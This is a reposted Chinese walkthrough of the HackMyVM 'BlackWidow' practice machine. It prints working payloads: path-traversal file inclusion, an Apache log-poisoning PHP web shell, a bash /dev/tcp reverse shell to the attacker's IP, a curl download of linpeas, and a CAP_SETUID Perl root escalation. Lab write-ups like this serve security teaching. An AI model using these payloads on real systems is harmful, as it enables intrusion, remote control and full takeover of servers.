渗透测试练习No.71 HackMyVm BlackWidow

admin 2025年2月22日00:31:48评论6 views字数 2497阅读8分19秒阅读模式

渗透测试练习No.71 HackMyVm BlackWidow

靶机信息

下载地址:

https://hackmyvm.eu/machines/machine.php?vm=BlackWidow
网盘链接:https://pan.baidu.com/s/1MYO7cEOg2xou1FrC40v6qg?pwd=ja7r

靶场:HackMyVm.eu

靶机名称: BlackWidow

难度:困难

发布时间:2021年5月7日

提示信息:

靶机第一次启动没成功,重新启动后可以正常访问

目标: user.txt和root.txt

实验环境

攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only

靶机:Vbox linux IP自动获取 网卡host-Only

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo arp-scan -I eth1 10.0.0.0/24

渗透测试练习No.71 HackMyVm BlackWidow

扫描到主机地址为10.0.0.129

扫描端口

扫描靶机开放的服务端口

sudo nmap -sC -sV -p- 10.0.0.129 -oN nmap.log

渗透测试练习No.71 HackMyVm BlackWidow

扫描到多个开放端口,先来看看80端口

Web渗透

渗透测试练习No.71 HackMyVm BlackWidow

访问后只有一张图片,做个目录扫描检查敏感url

gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://10.0.0.129 -x php,txt,html

扫描到/company目录,访问看看

渗透测试练习No.71 HackMyVm BlackWidow

渗透测试练习No.71 HackMyVm BlackWidow

源码中找到了一个链接,按照这个链接我们需要绑定域名,先来绑定域名再访问这个链接

sudo vi /etc/hosts

渗透测试练习No.71 HackMyVm BlackWidow

对company目录作个扫描

gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://10.0.0.129/company -x php,txt,html

渗透测试练习No.71 HackMyVm BlackWidow

仍然只有started.php这个动态页面,访问看看

http://blackwidow/company/started.php

渗透测试练习No.71 HackMyVm BlackWidow

渗透测试练习No.71 HackMyVm BlackWidow

源码中发现提示,正在开发使用file做为参数的php包含方法(后面发现index.php中也有这个提示,只是没太注意忽略了)

手动检测这个参数

http://blackwidow/company/started.php?file=/etc/passwd

渗透测试练习No.71 HackMyVm BlackWidow

没有返回,继续测试

http://blackwidow/company/started.php?file=../../../../../../../../../../../../../etc/passwd

渗透测试练习No.71 HackMyVm BlackWidow

匹配路径成功,拿到passwd文件。发现viper用户,继续收集敏感信息,nmap扫描时显示中间件为apache我们找找日志

http://blackwidow/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log

渗透测试练习No.71 HackMyVm BlackWidow

可以修改agent写入一句话木马,再通过文件包含执行命令

curl -A '<?php system($_GET[shell]); ?>' http://blackwidow/

渗透测试练习No.71 HackMyVm BlackWidow

http://blackwidow/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log&shell=id

渗透测试练习No.71 HackMyVm BlackWidow

写入成功,修改payload反弹shell到攻击机上

1。攻击机监听4444端口

rlwrap nc -lvvp 4444

渗透测试练习No.71 HackMyVm BlackWidow

2。反弹shell,payload部分需要url编码

编码前

http://blackwidow/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log&shell=bash -c 'bash -i >& /dev/tcp/10.0.0.3/4444 0>&1'

编码后

http://blackwidow/company/started.php?file=../../../../../../../../../../../../../var/log/apache2/access.log&shell=bash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.0.0.3%2f4444%200%3e%261'

渗透测试练习No.71 HackMyVm BlackWidow

反弹成功,找找敏感信息

cd /var/backups
ls
cat auth.log

渗透测试练习No.71 HackMyVm BlackWidow

找到viper的密码,登录SSH验证

ssh [email protected]

渗透测试练习No.71 HackMyVm BlackWidow

登录成功,继续查找敏感信息。

cd /home/viper
ls
cat local.txt

渗透测试练习No.71 HackMyVm BlackWidow

拿到flag文件local.txt,上传辅助脚本检查

1。攻击机上辅助脚本目录下开启HTTP服务

python3 -m http.server

渗透测试练习No.71 HackMyVm BlackWidow

2。靶机下载linpeas.sh并执行(靶机上没有wget,使用curl)

curl http://10.0.0.3:8000/linpeas.sh -o linpeas.sh

渗透测试练习No.71 HackMyVm BlackWidow

渗透测试练习No.71 HackMyVm BlackWidow

找到arsenic文件有CAP_SETUID能力,看看他有什么功能

cd backup_site/assets/vendor/weapon/
./arsenic -h

渗透测试练习No.71 HackMyVm BlackWidow

是perl程序,来看看如何提权

https://gtfobins.github.io/gtfobins/perl/#capabilities

渗透测试练习No.71 HackMyVm BlackWidow

知道如何提权,来验证一下

./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

渗透测试练习No.71 HackMyVm BlackWidow

提权成功,找一下flag

cd /root
ls
cat root.txt

渗透测试练习No.71 HackMyVm BlackWidow

拿到root.txt,游戏结束

渗透测试练习No.71 HackMyVm BlackWidow

渗透测试练习No.71 HackMyVm BlackWidow

原文始发于微信公众号(伏波路上学安全):渗透测试练习No.71 HackMyVm BlackWidow

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月22日00:31:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试练习No.71 HackMyVm BlackWidowhttps://cn-sec.com/archives/864188.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息